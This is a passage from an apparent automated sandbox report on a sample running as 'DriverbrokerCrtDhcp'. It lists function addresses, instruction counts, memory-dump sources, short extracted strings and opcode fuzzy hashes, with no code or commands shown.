Instruction Fuzzy Hash: 61F16C30F0865A8BDB58DB58C4B5ABCBBA1FF59310F1881BED51ED7292CE3C69419B40

Function 00007FFD34891A7D Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a9e013b6a168d2e0445ba74ebc4a28ef9c0bec713720ad0526cbc54b8f918ec
Instruction ID: b1bd04c0e3ddec7f6c486b42d252b24ca6268e006e774584e879f103deca102f
Opcode Fuzzy Hash: 3a9e013b6a168d2e0445ba74ebc4a28ef9c0bec713720ad0526cbc54b8f918ec
Instruction Fuzzy Hash: 6E91BF71A08A899FF794EB98C8B97E97FE1FF95304F14017AD009D72A2DF7928098740

Function 00007FFD34C52725 Relevance: 2.0, Strings: 1, Instructions: 787COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD34C52B97

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: d6226ace85ffab0076367afedea7261cbbcdf6afd6a06ef4eac36b270e4d7995
Instruction ID: 5f3d1473ebc17a739c9fc1221280db8cd53d008a76931f4d7c025fb7a59fd811
Opcode Fuzzy Hash: d6226ace85ffab0076367afedea7261cbbcdf6afd6a06ef4eac36b270e4d7995
Instruction Fuzzy Hash: 1E323231A0CB464FE759DB68D8A15B977E0FF56314B1842BAD189C7293DE38F8438B81

Function 00007FFD34C5F0B6 Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

s/, xrefs: 00007FFD34C5F2A5

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID: s/
API String ID: 0-1274184688
Opcode ID: 3704ff376047ec6e263455a4ac74e40b0d4f1969502426519b8459159b375db1
Instruction ID: f1d81069b8dd79496b6c38efb0218d2964b32f2c70f8f2fae24e4729e2dc9df4
Opcode Fuzzy Hash: 3704ff376047ec6e263455a4ac74e40b0d4f1969502426519b8459159b375db1
Instruction Fuzzy Hash: FB813635B0CA424FE72D6A2998A11BD77E0EF47310B1401BFD58EC3283CE2CB802A751

Function 00007FFD34C60048 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD34C600C2

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: de21a5d5ccb93642e67598c8ae856d61cfa8417a3b060abd84efc7579093b537
Instruction ID: 7b55a5aa2c5eeb8eb0672093b04a5f25139fb084d3c13018e52f7ba3d95e0159
Opcode Fuzzy Hash: de21a5d5ccb93642e67598c8ae856d61cfa8417a3b060abd84efc7579093b537
Instruction Fuzzy Hash: B9515831E0860A8FDB59DB99C4A15BDB7B1FF5A314F1481BBC11AE7292CB3C6906DB40

Function 00007FFD34C50218 Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD34C50292

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: ab5415fba0f7ef684a8388f8c3e2006bfa8dbecf787a54541918eaeb92978ee8
Instruction ID: fbec1b0fd6ed1f14a58b33593845afe135d0ff3800b243a05dd54dbbe47d951a
Opcode Fuzzy Hash: ab5415fba0f7ef684a8388f8c3e2006bfa8dbecf787a54541918eaeb92978ee8
Instruction Fuzzy Hash: 59516D71E0860A9FDB59DF9AD8A15FDB7B1FF5A300F1441BAC10AE7282CA386901DB51

Function 00007FFD34FF8B58 Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD34FF8BD2

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 87510ef4ad9ccfafa28cdf45c8daa9e103680d7ff8f6df681d2d52d08aa92767
Instruction ID: fb9066fbfbcae27b70af7de461814e10a5da1642ce5a566729d0a0924df6f720
Opcode Fuzzy Hash: 87510ef4ad9ccfafa28cdf45c8daa9e103680d7ff8f6df681d2d52d08aa92767
Instruction Fuzzy Hash: E6517D72E0850A8FDB59DB98C8A55FDB7B1FF4A300F1441BED11AE7282DB396805DB40

Function 00007FFD34C59552 Relevance: 1.4, Strings: 1, Instructions: 138COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD34C595C2

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 17eb319b27a716a792753027779cbe8a973b04746a80e2970b648e33e24df4b0
Instruction ID: f0221b003228dd8224570df5b9056d897400de7938d756e670fc560b0ac2597a
Opcode Fuzzy Hash: 17eb319b27a716a792753027779cbe8a973b04746a80e2970b648e33e24df4b0
Instruction Fuzzy Hash: 25415971E0854A9FEB59CB99C4A45BDBBB1FF5A300F5041FAD11AE7282CA386905DF40

Function 00007FFD34FF0EE8 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD34FF0F62

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: bca6cb42c24c6ffa01e95d77ab87b64b38f29b81a00c3c7d24c2205f65d9f0f5
Instruction ID: 31d7ca0703d3460d15dee6ae30423503f83a0ad7dcf25556cdf5d2e27629bae3
Opcode Fuzzy Hash: bca6cb42c24c6ffa01e95d77ab87b64b38f29b81a00c3c7d24c2205f65d9f0f5
Instruction Fuzzy Hash: 32413632E0864A8FDB49DB94C4A05FDB7B1FF46300F1441BED51AE7292CA396906DB00

Function 00007FFD34FFA96F Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

P|5, xrefs: 00007FFD35017769

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID: P|5
API String ID: 0-469658915
Opcode ID: 2df01d14f31d44e3a60c93c374b702059d6a73ceda1e0907a74b39447322d658
Instruction ID: d8ee9f9f92671fda714a80e30090546ad0f5d42dd0bae2a9f4905a9366463336
Opcode Fuzzy Hash: 2df01d14f31d44e3a60c93c374b702059d6a73ceda1e0907a74b39447322d658
Instruction Fuzzy Hash: 37311B34A1C90FDAEBA8DB5485656BE77B1FF44700F500176D11ED2285DE3A7A40FA42

Function 00007FFD34FFA9B8 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

P|5, xrefs: 00007FFD35016648

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID: P|5
API String ID: 0-469658915
Opcode ID: a11b62759f8e98cbda23a08cc6eb95e085afe2f19881714b18c2127c652e3dfb
Instruction ID: a77c95294a7c32023133a739560ebfc70d045a06b3e7b21e580db4602c78e940
Opcode Fuzzy Hash: a11b62759f8e98cbda23a08cc6eb95e085afe2f19881714b18c2127c652e3dfb
Instruction Fuzzy Hash: A6212910A1C46B4BE728821858706B97761FF41700B1445FAD15B8B8CFCA3EB981F7C2

Function 00007FFD34C526E9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD34C52706

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: e1e0799adc673ce612e240bbb605795f006569c5321d2578e22170a011cbdd2e
Instruction ID: feee22d24e2b0b0633e21c0fbdc2667b85fd487711641e6972051b6235fe642b
Opcode Fuzzy Hash: e1e0799adc673ce612e240bbb605795f006569c5321d2578e22170a011cbdd2e
Instruction Fuzzy Hash: CEE06D7160E7C44FCB1AAA74886D854BFA0EF6721174A42EFC045CF1A7EA2D8889CB01

Function 00007FFD34C59749 Relevance: .5, Instructions: 478COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 698140d9562c898d4b317e3d1fe27fe32eb682fa63b6077abb7b6b2d0980f241
Instruction ID: 2b502a326cbe432b3525e50e04a8c3fec2f33402356b0863b04e3e077e496ad1
Opcode Fuzzy Hash: 698140d9562c898d4b317e3d1fe27fe32eb682fa63b6077abb7b6b2d0980f241
Instruction Fuzzy Hash: FA02A270A186558FEB58CF14C4E46B8B7A1FF46300F5442FEC94ECB68ADA38B881DB41

Function 00007FFD34C50419 Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8b88c3aa3f0f70a4bec5f777146f4133bab19e769c17f6ead2775864c1a589b
Instruction ID: ea9fcae07c2861ed86af3563aa242b213835f3149bcaacdb28017184f936999a
Opcode Fuzzy Hash: b8b88c3aa3f0f70a4bec5f777146f4133bab19e769c17f6ead2775864c1a589b
Instruction Fuzzy Hash: ACF180306196568FEB59CF19C4E16BD37A1FF46310F5445FAC94ACB68ACA3CE881CB81

Function 00007FFD34C5A801 Relevance: .4, Instructions: 413COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 030182c74fad5145ea7e85bfcd6a170836c043e916affa184bd37fc22fb20b58
Instruction ID: 2085c89341508f159e6aa247afe4c9fb6d746205a3254c4cc1a4055a33f31144
Opcode Fuzzy Hash: 030182c74fad5145ea7e85bfcd6a170836c043e916affa184bd37fc22fb20b58
Instruction Fuzzy Hash: 56D1D330A0DA464FE369DB2AD0E157D77E1FF46310B1445BFC58EC7682DA2EB8429B81

Function 00007FFD34FF21A1 Relevance: .4, Instructions: 397COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f4850f374c827f7eda9d438e8ef6e4a9332217d91ad1c495e330aeae0a1bcb7
Instruction ID: d11649df7db6995e3c206874ef97eb1ff2f49dd5902a362957d1de5172f247e5
Opcode Fuzzy Hash: 9f4850f374c827f7eda9d438e8ef6e4a9332217d91ad1c495e330aeae0a1bcb7
Instruction Fuzzy Hash: 89D1E032A0DA468FE368DB28D4E117577E1FF46300B19467EC58AC7692DE2EF8429B41

Function 00007FFD34C60249 Relevance: .4, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb5dec02f034502011515bd56ff3ea5b5a67983e7a619f9a26e49a2e324d1144
Instruction ID: 090da25733e0d867f914d6261d59fe6ca2c0112685b83f6cdca301036fe3b77f
Opcode Fuzzy Hash: cb5dec02f034502011515bd56ff3ea5b5a67983e7a619f9a26e49a2e324d1144
Instruction Fuzzy Hash: EBE1A3706186458FEB59CF19C4E05B937A1FF46321B5886BEC94ADB68BC73CE881CB40

Function 00007FFD34C514F7 Relevance: .4, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f816cc6427d2e8570150bdc5fa60afc3834e49a9d44dc5e3c92665fca190fb3
Instruction ID: 780ddd5b6212c3985588e96ce68d857bbe2214175224757dd3a2408ae1667c02
Opcode Fuzzy Hash: 8f816cc6427d2e8570150bdc5fa60afc3834e49a9d44dc5e3c92665fca190fb3
Instruction Fuzzy Hash: 4CD1D030E0DA468FE369DB29D4A85BD77E1FF46300B2445BFC58AC7682DE2DB8429741

Function 00007FFD34FF3722 Relevance: .4, Instructions: 365COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f520558d6e309aa20ab7b81965611fb4ca3ff5c8d1104fe341ca6939a8708757
Instruction ID: 0f9c98df34ed38faaadfe910344bed4e67c1ae60a7d6f3459244b9cfd9ed9d18
Opcode Fuzzy Hash: f520558d6e309aa20ab7b81965611fb4ca3ff5c8d1104fe341ca6939a8708757
Instruction Fuzzy Hash: A8B1173370C6559FE764AA6CE8A65F577E0EF4632070C02BAE18DC7593DA2CB805C781

Function 00007FFD34FF6AD0 Relevance: .4, Instructions: 364COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7395075dceae5be0c9d4f86601a4293c08ce2edb985b034d5a7e4770e391a447
Instruction ID: eb2765af0a6999488fcc1ce30f9f3715418cb5d391ad7d98fdd4290526c1b3fb
Opcode Fuzzy Hash: 7395075dceae5be0c9d4f86601a4293c08ce2edb985b034d5a7e4770e391a447
Instruction Fuzzy Hash: A5C15231718A1D8FEB58DB58C8959B9B3F2FF59314B1441A9D14EC72A2DE35EC42CB40

Function 00007FFD34C602DF Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87c188edcf6e078395474de3f0353bacde663f21a607c48ce137e4334b7eeb42
Instruction ID: af811f9f555dffa9ca0f0526bebaf8456c8129ba3b7b315aa3e8c565ada861e7
Opcode Fuzzy Hash: 87c188edcf6e078395474de3f0353bacde663f21a607c48ce137e4334b7eeb42
Instruction Fuzzy Hash: 64C1A2706185468BEB19CF19C0E05B937A1FF46325B5886BEC94BDB68BCB3CE841DB41

Function 00007FFD34C5D219 Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64924ab372a29823c7747270ba4567b7f1eaafba20fd84045fa55c3e94cd351c
Instruction ID: ee3ef6248d327a2b746d64ef729cd770d666afd2fcd099d16c1ebb25ac16d2ee
Opcode Fuzzy Hash: 64924ab372a29823c7747270ba4567b7f1eaafba20fd84045fa55c3e94cd351c
Instruction Fuzzy Hash: E3A15C3170D74A4FE728EB1998B65FD37A0EF46320B1842FBD18DC7593DA1CA8068782

Function 00007FFD34FF8DEF Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 199c46151f3cde1daf7d5f3912ba35146e98e9a22de23d4e6e8524b25729516d
Instruction ID: bca31e2b0fb6f39948482cbcf02901a92ad5a372a84af44aef812e1e9d1b028e
Opcode Fuzzy Hash: 199c46151f3cde1daf7d5f3912ba35146e98e9a22de23d4e6e8524b25729516d
Instruction Fuzzy Hash: F6C1BE316185468FEB0DCF18C4E49B137A1FF46310B5846BDC94ACB68BDA3CE891DB81

Function 00007FFD34C504AF Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26aef1bd2180a23a69c5a7eaddd301cef07bdbea2d204d7d6397f1237d5fe10c
Instruction ID: a6a6dbc3145394216039b0dbc48bb6651c04d27941e5ee6b0f435037e6447fa3
Opcode Fuzzy Hash: 26aef1bd2180a23a69c5a7eaddd301cef07bdbea2d204d7d6397f1237d5fe10c
Instruction Fuzzy Hash: 0CC18C306195568BEB19CF16C0E15B937A1FF86310B5446BEC95ACB68BCA3CF881DB81

Function 00007FFD34C597DF Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 210547040f877e488969c05f1082bee17f4fdee0cac1777b06405bcdf7606334
Instruction ID: 72698e2df6087ac6297aba9971c7fe9122ced7713011337ffd04ac751ca3edf7
Opcode Fuzzy Hash: 210547040f877e488969c05f1082bee17f4fdee0cac1777b06405bcdf7606334
Instruction Fuzzy Hash: 5EC1AD706186468BEB19CF05C0E45B9B7A1FF46310F5446FEC94ACB68ACA3CF881DB40

Function 00007FFD34C5FB72 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a98714db8a417863fd90eca23660474343de2064ccb2ec86957d8a164873d9d8
Instruction ID: c0d1704999fd174ea668dbb2e7d542559d64bdfc950b88bcf7a15f073bc7c5e1
Opcode Fuzzy Hash: a98714db8a417863fd90eca23660474343de2064ccb2ec86957d8a164873d9d8
Instruction Fuzzy Hash: 1AC1A030708A469FE74DDB29C0A16ACB7A1FF5A310F5441BAC54EC7A87CB38B851CB90

Function 00007FFD34FF8D59 Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0d072a6f3de55f8b73634577cc5d73f81fda1d5f78122c05251b97a996b7095
Instruction ID: 33235a879819aba6be88e4caf655ce92c4844e5288010d2b7ee51261db46d61f
Opcode Fuzzy Hash: c0d072a6f3de55f8b73634577cc5d73f81fda1d5f78122c05251b97a996b7095
Instruction Fuzzy Hash: F4C1F3716186458FEB48CF18C4E46B13BA1FF46310B5842BDC94ACB68BD77CE891CB81

Function 00007FFD34FF8682 Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c446a26459db63881a12341d4437a85f432a6b8fb4c91b052a5f9297f72a1fa8
Instruction ID: ab4c5f2b2b4c3b4e944d079541906e89483446ad9d977acb46727895eee53be7
Opcode Fuzzy Hash: c446a26459db63881a12341d4437a85f432a6b8fb4c91b052a5f9297f72a1fa8
Instruction Fuzzy Hash: 65C1E431708A469FE749DB58C4E06A4B7E1FF4A300F5842B9C54EC7A86CB3CB861CB91

Function 00007FFD34C59072 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16df4d441e140a40eb8c02f7a921577147c7b1346b203a5878718895fdd7c8ab
Instruction ID: 1552e5eb292784821418d70326435eee06b552ec60271e1ed748093bd705e283
Opcode Fuzzy Hash: 16df4d441e140a40eb8c02f7a921577147c7b1346b203a5878718895fdd7c8ab
Instruction Fuzzy Hash: 31C1B130708A468FE749DB29C4A16B8B7A1FF5A310F5441FAC54EC7A96CB3CB851DB90

Function 00007FFD34FF0A12 Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5db6f9f7f2712229a549fe36350d9e31dcc588f4852e1d22f7094bfeac1a6ed6
Instruction ID: 2ffd506a8030e9cd12cdff2ed6e99e94ef188074a0e63745b8b35b923a0989cf
Opcode Fuzzy Hash: 5db6f9f7f2712229a549fe36350d9e31dcc588f4852e1d22f7094bfeac1a6ed6
Instruction Fuzzy Hash: 69B1C171B19A469FE749DB18C0E06A4B7E1FF46300F5842B9C54EC7A8ADB38B851CB94

Function 00007FFD34FF6047 Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f05eaf427e0d47bd045b4597fea7e2bf552a21c495563082e4a3728cc9566f87
Instruction ID: d530848e48b1e2ee91d8e78dea4390a64898691a0f8d41cebef61f2c147dcb31
Opcode Fuzzy Hash: f05eaf427e0d47bd045b4597fea7e2bf552a21c495563082e4a3728cc9566f87
Instruction Fuzzy Hash: 9A218D13F0C1578BFA7826E828B11F82750EF47321F2C03BBD64DC60A28C5D38466282

Function 00007FFD34C56A47 Relevance: .3, Instructions: 304COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 476aa63d4782e04ea0b8abd1fbe6c04312712c962ce404c0deff01c998a5f057
Instruction ID: 6790729ba6f782b1c5e165e75e4880566a4285b9db51a03c2fa2661e21147ca1
Opcode Fuzzy Hash: 476aa63d4782e04ea0b8abd1fbe6c04312712c962ce404c0deff01c998a5f057
Instruction Fuzzy Hash: F0218D22F0D5979AF66466AA28B10FC2A60DF57324F2842F7D64DC62E3DC1D78457382

Function 00007FFD34C566F9 Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b6554e5c5058017bb24d131f433d017b5ca59da12bd1b6e865f0ba469a375f2
Instruction ID: 761572a76508e9a72918f45c6d5aa19e344e77a66fd84bd9c0bd1515e0910619
Opcode Fuzzy Hash: 0b6554e5c5058017bb24d131f433d017b5ca59da12bd1b6e865f0ba469a375f2
Instruction Fuzzy Hash: 3391383170C5894FE768DA1988A65BD37D0FF46320B1402FBD69EC75B2DA1CA81AC782

Function 00007FFD34C5D4C5 Relevance: .3, Instructions: 293COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dd8cd31efe80eae0ba465411bf58e2c11e8cdb1b49930fb9771b904d85dc5d6
Instruction ID: c5a79efbf6c8d1bee5405742d06ef2019bbb9f856703eed9f21024d63519f5f5
Opcode Fuzzy Hash: 9dd8cd31efe80eae0ba465411bf58e2c11e8cdb1b49930fb9771b904d85dc5d6
Instruction Fuzzy Hash: 9E21CF12F0D79346F62526B628B10FC5794AF57794F2C41F7E68EC65CADC4C28457282

Function 00007FFD34FF5CF9 Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34ba8c3435efb662379ed0f024bc3e60729c35a27271e5ce606c5b713bf0af05
Instruction ID: 373ab01a93d3c8dbfb13c3325c5f2c4229092dbe83bba25070251ff1e3312535
Opcode Fuzzy Hash: 34ba8c3435efb662379ed0f024bc3e60729c35a27271e5ce606c5b713bf0af05
